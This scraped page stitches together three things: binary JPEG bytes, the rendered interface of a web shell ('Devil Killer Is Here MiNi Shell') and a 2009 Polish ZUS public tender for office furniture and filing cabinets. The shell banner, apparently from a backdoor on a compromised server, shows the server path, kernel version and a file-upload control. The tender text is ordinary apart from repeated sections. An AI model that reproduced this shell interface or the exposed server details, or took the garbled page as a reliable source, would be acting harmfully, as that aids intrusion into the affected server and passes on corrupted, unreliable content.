JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091013/355846-N-2009.html

<p class="kh_header"><b>Rzeszów: Zakup mebli biurowych dla O/ZUS w Rzeszowie i podległych Inspektoratów</b><br>
<b>Numer ogłoszenia: 355846 - 2009; data zamieszczenia: 13.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup mebli biurowych dla O/ZUS w Rzeszowie i podległych Inspektoratów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zamówienia

I. Przedmiotem zamówienia jest dostawa mebli biurowych określonych poniżej.1.  Szafa biurowa  o wymiarach  410 x 800 mm i wysokości 1840 mm, wyposażona  w  dwoje symetrycznie otwieranych drzwi, zawiasy puszkowe typu Twist-Lock gwarantujące  bezusterkowa pracę co najmniej przez 60 000 cykli otwierania zamykania, zamykana zamkiem, uchwyty na drzwiach metalowe czarne, ilość półek czynnych - 5 (w tym półka stanowiąca dno szafy). Szafa wykonana z płyty wiórowej melaminowanej posiadającej atest higieny  E-1, kolor buk D 381PR o grubości płyty 18 mm, obrzeże PCV grubości   min 1 mm (korpusy i drzwi) wtapiane na gorąco. Płyta górna (zwieńczenie) z płyty wiórowej melaminowanej grubości 25 mm, obrzeże PCV, grubości 2 mm. Plecy wykonane z płyty pilśniowej lakierowanej grubości 3 mm. Półki wykonane z płyty wiórowej laminowanej grubości 18 mm, obrzeże PCV wtapiane na gorąco grubości 1 mm.  Szafy o jakości co najmniej  Wuteh ZW 08 Clasic.  Korpus szafy powinien być przykręcany do zwieńczenia, najniższej półki oraz półki środkowej za pomocą śrub.  Szafa wyposażona w cokół o wysokości ok. 8 cm, górę cokołu stanowi najniższa półka umieszczona na wysokości 10 cm od podłoża
2. Biurko o wymiarach 600 x 1200 i wys. 730 mm. Blat biurka z płyty wiórowej melaminowanej w kolorze buk D 381 PR posiadającej atest higieny E-1, grubość  blatu  25 mm,  krawędzie płyt wykończone trwałą doklejką PCV grubości 2 mm wtapianą na gorąco. Blat biurka przykręcony na stałe do metalowej ramy z rury stalowej o profilu 30 mm x 15 mm gr. 1,5 mm. Biurko wyposażone w blendę przednią o szer. 400 mm i długości stanowiący wymiar  pomiędzy nogami biurka ,  płyta melaminowana kolor buk D 381 PR i grubości 18 mm,  blenda mocowana  za pomocą śrub do wewnętrznej strony nóg biurka.  Nogi biurka przykręcone do ramy za pomocą śruby M8, wykonane z rury o profilu 30 x 30 x 1,5 mm, wyposażone  w regulator poziomu PCV o zakresie  regulacji 0-15 mm. Biurko o jakości co najmniej  Wuteh SW 35 Clasic
3. Kontener  do biurka o wymiarach : 580 x 410 mm o wys.  630-660 mm (wraz z kółkami), umożliwiających  wsunięcie go pod biurko z poz.3, wyposażony w cztery kółeczka, cztery szuflady o równych wymiarach, szuflady zamykane zamkiem centralnym umieszczonym w górnej szufladzie.  Kontener wykonany z płyty melaminowanej kolor buk D 381 PR o grubości płyty 18 mm i  zwieńczeniach 25 mm, doklejki  PCV wtapiane na gorąco odpowiednio do grubości  płyty 1 i 2 mm. Uchwyty do szuflad czarne metalowe. Szuflady gwarantujące co najmniej   90 000 cykli używania na  prowadnicach metalowych. Boczne  ścianki szuflad metalowe, dno oraz ścianki przednie i tylne z płyty identycznej z płytą kontenera. Kontener o jakości co najmniej  Wuteh KO-4.
4.  Stolik pod telefon o wymiarach płyty 600 x 340 mm i wysokości 700 mm wykonany z płyty wiórowej melaminowanej w kolorze buk D 381 PR posiadającej atest higieny E-1,  grubość płyty 25 mm,  krawędzie okleinowane PCV o grubości 2 mm wtapiane na gorąco.  Stelaż stolika wykonany z rur metalowych 20 x 20 x 1,5 mm malowanych na czarno. Stolik ma dwie półki, górną na wysokości 700 mm od podłoża i dolną na   wysokości 250 mm ( góra płyty) od podłoża
5. Krzesła typu Prestige GTP Profit producent Nowy Styl Krosno. Krzesła obrotowe z miękkimi podłokietnikami, podstawa - krzyżak pięcioramienny pokryty nakładkami z plastiku na kółkach samohamowanych, do wykładzin, płynna regulacja wysokości siedziska, mechanizm CPT - (regulacja kąta oparcia za pomocą śruby, regulacja głębokości siedziska), oparcie ergonomiczne profilowane. Tapicerka C24 (na wzór istniejących w O/ZUS w Rzeszowie). Części użyte do produkcji oferowanych krzeseł powinny umożliwiać zastosowanie ich w krzesłach używanych przez Zamawiającego - Prestige GTP.
6.  Stolik pod komputer o wys. 780 mm, wymiary półki pod monitor 500 x 700 mm, półka na wysokości 780 mm,  stolik wyposażony w wysuwaną na prowadnicach  metalowych półkę o wymiarach ok. 570 mm x 400 mm pod klawiaturę komputerową. Stolik na ramie metalowej czarnej w kształcie rury kwadratowej 30 x 30 x 1,5 mm.  Stolik wyposażony w 4 kółka oraz dolną półkę o wymiarach 33x64 cm przymocowaną do dolnych ram. Półki wykonane z płyty wiórowej melaminowanej o grubości 25 mm w kolorze buk D 381 PR posiadającej  atest higieny  E-1 okleinowane  PCV o grubości 2 mm.  Półka pod klawiaturę wykonana z płyty  wiórowej melaminowanej o gr. 18 mm w kolorze  buk D 381 PR posiadającej atest higieny E-1 okleinowana PCV o gr. 1 mm wtapiana na gorąco. Stolik o jakości co najmniej  Wuteh  SW28 Clasic. Odległość pomiędzy górą półki pod klawiaturę a dołem półki  pod monitor  -11 cm  Nadstawka nad stolik komputerowy wykonana z płyty wiórowej melaminowanej w  kolorze buk D 381 PR posiadającej atest higieny E-1, grubość płyty 25 mm, wymiary płyty  250 x 700 mm. Krawędzie płyty  okleinowane PCV o gr. 2 mm wtapiane na gorąco.  Płyta przykręcona śrubami na stelażu metalowym w kształcie rur kwadratowych 30 x 20 x 1,5 mm umożliwiającym przymocowanie półki do stolika komputerowego ( montaż do tylnego stelaża stolika pod komputer za pomocą czterech śrub, z możliwością regulacji wysokości w trzech poziomach). Maksymalna odległość w świetle pomiędzy płytą nadstawki  a  płytą półki stolika pod komputer w zakresie od 46 cm do 50 cm. Nadstawka o jakości co najmniej  Wuteh N-28 . 
Wymagania dotyczące wszystkich mebli
1.Wszystkie elementy metalowe mebli malowane w kolorze czarnym metodą piecową lub  proszkową. 
2.	Wszystkie profile metalowe o przekroju zamkniętym maja być zabezpieczone na końcach  plastikowymi zaślepkami w kolorze czarnym.
3.	Meble należy dostarczyć, rozładować, zmontować oraz umieścić w pomieszczeniach wskazanych przez zamawiającego.
4. Meble będą dostarczane do siedziby OZUS w Rzeszowie przy Al. Piłsudskiego 12 oraz do podległych jednostek terenowych tzn: IZUS w Mielcu przy ul. Sikorskiego 4, IZUS w Stalowej Woli przy ul. Popiełuszki 8,  IZUS w Przeworsku przy ul Dworcowej 1, IZUS w Przemyślu przy ul. Brodzińskiego 6, IZUS w Leżajsku przy ul. Mickiewicza 24, IZUS w Jarosławiu przy ul. Słowackiego 21 oraz Biura Terenowego w  Lubaczowie przy ul. Legionów 

4.Harmonogram dostaw
						
Szafa biurowa - 7 szt.
Biurko - 26 szt. Kontener - 31 szt. 
Stolik pod komputer z nadstawką - 51 szt.
Stolik pod telefon - 36 szt.
Krzesło obrotowe - 52 szt.

Część II zamówienia
1.Przedmiotem zamówienia jest dostawa metalowych szaf aktowych i kartotekowych określonych poniżej.
1.1	Szafa metalowa na akta. Szafa metalowa na akta o wymiarach zewnętrznych : wys. od 19000 mm do 2000 mm, szer. od 900 mm do 1000 mm, głębokość od 410 mm do 435 mm, wyposażona w dwoje symetrycznie otwieranych drzwi, zamykanych zamkiem patentowym, klamką uruchamiającą wewnętrzne rygle blokujące od środka drzwi. Ilość półek czynnych 5 ( w tym półka stanowiąca dno szafy). Szafa wykonana  z blachy stalowej malowanej na zewnątrz i wewnątrz proszkowo lub natryskowo na kolor jasny popiel. Szafy powinny posiadać parametry nie gorsze niż parametry szafy Litopol lub Kart Map
1.2. Szafa kartotekowa Format A-4  pojedyncza.Szafa kartotekowa metalowa do archiwizowania dokumentów - 1 rząd w szufladzie.Wymiary zewnętrzne szafy:  szerokość od. 400 do 440 mm,  głębokość od. 580 do 700 mm (przy zachowaniu głębokości użytkowej szuflady min. 500 mm), wysokość od. 1093 do 1320 mm, wyposażona w  4 szuflady.Szuflady zamykane centralnie jednym zamkiem patentowym w górnej, z boku lub powyżej górnej  szuflady. Szuflady zawieszone na prowadnicach kulkowych o pełnym wysuwie  z zabezpieczeniem przed wypadaniem. Możliwość wysuwania dowolnie wybranej tylko jednej szuflady w celu zachowania  stabilności . Obciążenie szuflad min 50 kg. Szafa wykonana z blachy stalowej malowanej wraz z szufladami wewnątrz i zewnątrz  proszkowo lub natryskowo na kolor jasny popiel. Jakość nie gorsza niż szafy Kart-Map Olsztyn,  Met-Lak, Malow.
1.3. Szafa kartotekowa Format A-5.Szafa kartotekowa metalowa do archiwizowania dokumentów.Wymiary zewnętrzne szafy  :  szerokość od. 540 do 550 mm, głębokość szafy od. 580 do  700 mm (przy zachowaniu głębokości użytkowej szuflady min. 500 mm), wysokość szafki od. 1038 - 1285 mm,  wyposażona w 5 szuflad, każda z nich podzielona na długość listwą metalową, umożliwiającą przechowywanie dwóch rzędów dokumentów A-5 w jednej w szufladzie. Szuflady zamykane centralnie jednym zamkiem patentowym w górnej z boku lub powyżej górnej szuflady. Szuflady zawieszone na prowadnicach kulkowych o pełnym wysuwie, z zabezpieczeniem przed wypadaniem. Możliwość wysuwania dowolnie wybranej  jednej szuflady w celu zachowania stabilności. Minimalne obciążenie szuflad 50 kg. Szafa wykonana  z blachy stalowej  malowanej  wraz z szufladami wewnątrz i zewnątrz proszkowo lub natryskowo  na kolor jasny popiel.Jakość nie gorsza niż  szafy  Kart-Map Olsztyn, Met-Lak, Malow.
Grubości blach zewnętrznych w zamawianych szafach (korpusów)  min. 1 mm, frontów, szuflad - min. 1 mm. Pozostałe części szuflad z blachy gr. Min. 0,8 mm2. Warunki i terminy dostaw: 
2.1. Meble będą dostarczane do siedziby OZUS w Rzeszowie przy Al. Piłsudskiego 12 oraz do podległych jednostek terenowych tzn: IZUS w Przeworsku przy ul. Dworcowej 1, IZUS w Przemyślu przy ul. Brodzińskiego 6, IZUS w Leżajsku przy ul. Mickiewicza 24, IZUS w Jarosławiu przy ul. Słowackiego 21 oraz Biura Terenowego w  Lubaczowie przy ul. Legionów 4 
2.2. Meble należy dostarczyć, rozładować, zmontować oraz umieścić w pomieszczeniach wskazanych przez zamawiającego.

Harmonogram dostaw			

Szafa aktowa - 1 szt.	
Szafa kartotekowa A4 - 12 szt.	
Szafa kartotekowa A5 - 23 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.13.21.00-7, 39.13.40.00-0, 39.12.11.00-7, 39.11.20.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych, tzn:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I. Na potwierdzenie spełnienia warunków udziału w postępowaniu Wykonawca złoży:
1. oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych  
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, 
3. Oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych 
4. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
5. zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.

II. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów określonych w pkt. 2, 4, 5 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
 Dokument, o którym mowa w pkt. II lit. a), powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Dokument, o którym mowa w pkt. II. lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt. II. lit. a) i b), Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12,35-075 Rzeszów
(ul. Siemiradzkiego 8 pok. nr 1).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:00, miejsce: Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie Al.Piłsudskiego 12, 35-075 Rzeszów pok. nr. 23 - Dziennik podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mebli biurowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Szafa biurowa  o wymiarach  410 x 800 mm i wysokości 1840 mm, wyposażona  w  dwoje symetrycznie otwieranych drzwi, zawiasy puszkowe typu Twist-Lock gwarantujące  bezusterkowa pracę co najmniej przez 60 000 cykli otwierania zamykania, zamykana zamkiem, uchwyty na drzwiach metalowe czarne, ilość półek czynnych - 5 (w tym półka stanowiąca dno szafy). Szafa wykonana z płyty wiórowej melaminowanej posiadającej atest higieny  E-1, kolor buk D 381PR o grubości płyty 18 mm, obrzeże PCV grubości   min 1 mm (korpusy i drzwi) wtapiane na gorąco. Płyta górna (zwieńczenie) z płyty wiórowej melaminowanej grubości 25 mm, obrzeże PCV, grubości 2 mm. Plecy wykonane z płyty pilśniowej lakierowanej grubości 3 mm. Półki wykonane z płyty wiórowej laminowanej grubości 18 mm, obrzeże PCV wtapiane na gorąco grubości 1 mm.  Szafy o jakości co najmniej  Wuteh ZW 08 Clasic.  Korpus szafy powinien być przykręcany do zwieńczenia, najniższej półki oraz półki środkowej za pomocą śrub.  Szafa wyposażona w cokół o wysokości ok. 8 cm, górę cokołu stanowi najniższa półka umieszczona na wysokości 10 cm od podłoża
2. Biurko o wymiarach 600 x 1200 i wys. 730 mm. Blat biurka z płyty wiórowej melaminowanej w kolorze buk D 381 PR posiadającej atest higieny E-1, grubość  blatu  25 mm,  krawędzie płyt wykończone trwałą doklejką PCV grubości 2 mm wtapianą na gorąco. Blat biurka przykręcony na stałe do metalowej ramy z rury stalowej o profilu 30 mm x 15 mm gr. 1,5 mm. Biurko wyposażone w blendę przednią o szer. 400 mm i długości stanowiący wymiar  pomiędzy nogami biurka ,  płyta melaminowana kolor buk D 381 PR i grubości 18 mm,  blenda mocowana  za pomocą śrub do wewnętrznej strony nóg biurka.  Nogi biurka przykręcone do ramy za pomocą śruby M8, wykonane z rury o profilu 30 x 30 x 1,5 mm, wyposażone  w regulator poziomu PCV o zakresie  regulacji 0-15 mm. Biurko o jakości co najmniej  Wuteh SW 35 Clasic
3. Kontener  do biurka o wymiarach : 580 x 410 mm o wys.  630-660 mm (wraz z kółkami), umożliwiających  wsunięcie go pod biurko z poz.3, wyposażony w cztery kółeczka, cztery szuflady o równych wymiarach, szuflady zamykane zamkiem centralnym umieszczonym w górnej szufladzie.  Kontener wykonany z płyty melaminowanej kolor buk D 381 PR o grubości płyty 18 mm i  zwieńczeniach 25 mm, doklejki  PCV wtapiane na gorąco odpowiednio do grubości  płyty 1 i 2 mm. Uchwyty do szuflad czarne metalowe. Szuflady gwarantujące co najmniej   90 000 cykli używania na  prowadnicach metalowych. Boczne  ścianki szuflad metalowe, dno oraz ścianki przednie i tylne z płyty identycznej z płytą kontenera. Kontener o jakości co najmniej  Wuteh KO-4.
4.  Stolik pod telefon o wymiarach płyty 600 x 340 mm i wysokości 700 mm wykonany z płyty wiórowej melaminowanej w kolorze buk D 381 PR posiadającej atest higieny E-1,  grubość płyty 25 mm,  krawędzie okleinowane PCV o grubości 2 mm wtapiane na gorąco.  Stelaż stolika wykonany z rur metalowych 20 x 20 x 1,5 mm malowanych na czarno. Stolik ma dwie półki, górną na wysokości 700 mm od podłoża i dolną na   wysokości 250 mm ( góra płyty) od podłoża
5. Krzesła typu Prestige GTP Profit producent Nowy Styl Krosno. Krzesła obrotowe z miękkimi podłokietnikami, podstawa - krzyżak pięcioramienny pokryty nakładkami z plastiku na kółkach samohamowanych, do wykładzin, płynna regulacja wysokości siedziska, mechanizm CPT - (regulacja kąta oparcia za pomocą śruby, regulacja głębokości siedziska), oparcie ergonomiczne profilowane. Tapicerka C24 (na wzór istniejących w O/ZUS w Rzeszowie). Części użyte do produkcji oferowanych krzeseł powinny umożliwiać zastosowanie ich w krzesłach używanych przez Zamawiającego - Prestige GTP.
6.  Stolik pod komputer o wys. 780 mm, wymiary półki pod monitor 500 x 700 mm, półka na wysokości 780 mm,  stolik wyposażony w wysuwaną na prowadnicach  metalowych półkę o wymiarach ok. 570 mm x 400 mm pod klawiaturę komputerową. Stolik na ramie metalowej czarnej w kształcie rury kwadratowej 30 x 30 x 1,5 mm.  Stolik wyposażony w 4 kółka oraz dolną półkę o wymiarach 33x64 cm przymocowaną do dolnych ram. Półki wykonane z płyty wiórowej melaminowanej o grubości 25 mm w kolorze buk D 381 PR posiadającej  atest higieny  E-1 okleinowane  PCV o grubości 2 mm.  Półka pod klawiaturę wykonana z płyty  wiórowej melaminowanej o gr. 18 mm w kolorze  buk D 381 PR posiadającej atest higieny E-1 okleinowana PCV o gr. 1 mm wtapiana na gorąco. Stolik o jakości co najmniej  Wuteh  SW28 Clasic. Odległość pomiędzy górą półki pod klawiaturę a dołem półki  pod monitor  -11 cm  Nadstawka nad stolik komputerowy wykonana z płyty wiórowej melaminowanej w  kolorze buk D 381 PR posiadającej atest higieny E-1, grubość płyty 25 mm, wymiary płyty  250 x 700 mm. Krawędzie płyty  okleinowane PCV o gr. 2 mm wtapiane na gorąco.  Płyta przykręcona śrubami na stelażu metalowym w kształcie rur kwadratowych 30 x 20 x 1,5 mm umożliwiającym przymocowanie półki do stolika komputerowego ( montaż do tylnego stelaża stolika pod komputer za pomocą czterech śrub, z możliwością regulacji wysokości w trzech poziomach). Maksymalna odległość w świetle pomiędzy płytą nadstawki  a  płytą półki stolika pod komputer w zakresie od 46 cm do 50 cm. Nadstawka o jakości co najmniej  Wuteh N-28 . Wymagania dotyczące wszystkich mebli
1.Wszystkie elementy metalowe mebli malowane w kolorze czarnym metodą piecową lub  proszkową. 
2.	Wszystkie profile metalowe o przekroju zamkniętym maja być zabezpieczone na końcach  plastikowymi zaślepkami w kolorze czarnym.
3.	Meble należy dostarczyć, rozładować, zmontować oraz umieścić w pomieszczeniach wskazanych przez zamawiającego.
4. Meble będą dostarczane do siedziby OZUS w Rzeszowie przy Al. Piłsudskiego 12 oraz do podległych jednostek terenowych tzn: IZUS w Mielcu przy ul. Sikorskiego 4, IZUS w Stalowej Woli przy ul. Popiełuszki 8,  IZUS w Przeworsku przy ul Dworcowej 1, IZUS w Przemyślu przy ul. Brodzińskiego 6, IZUS w Leżajsku przy ul. Mickiewicza 24, IZUS w Jarosławiu przy ul. Słowackiego 21 oraz Biura Terenowego w  Lubaczowie przy ul. Legionów 4.</li>
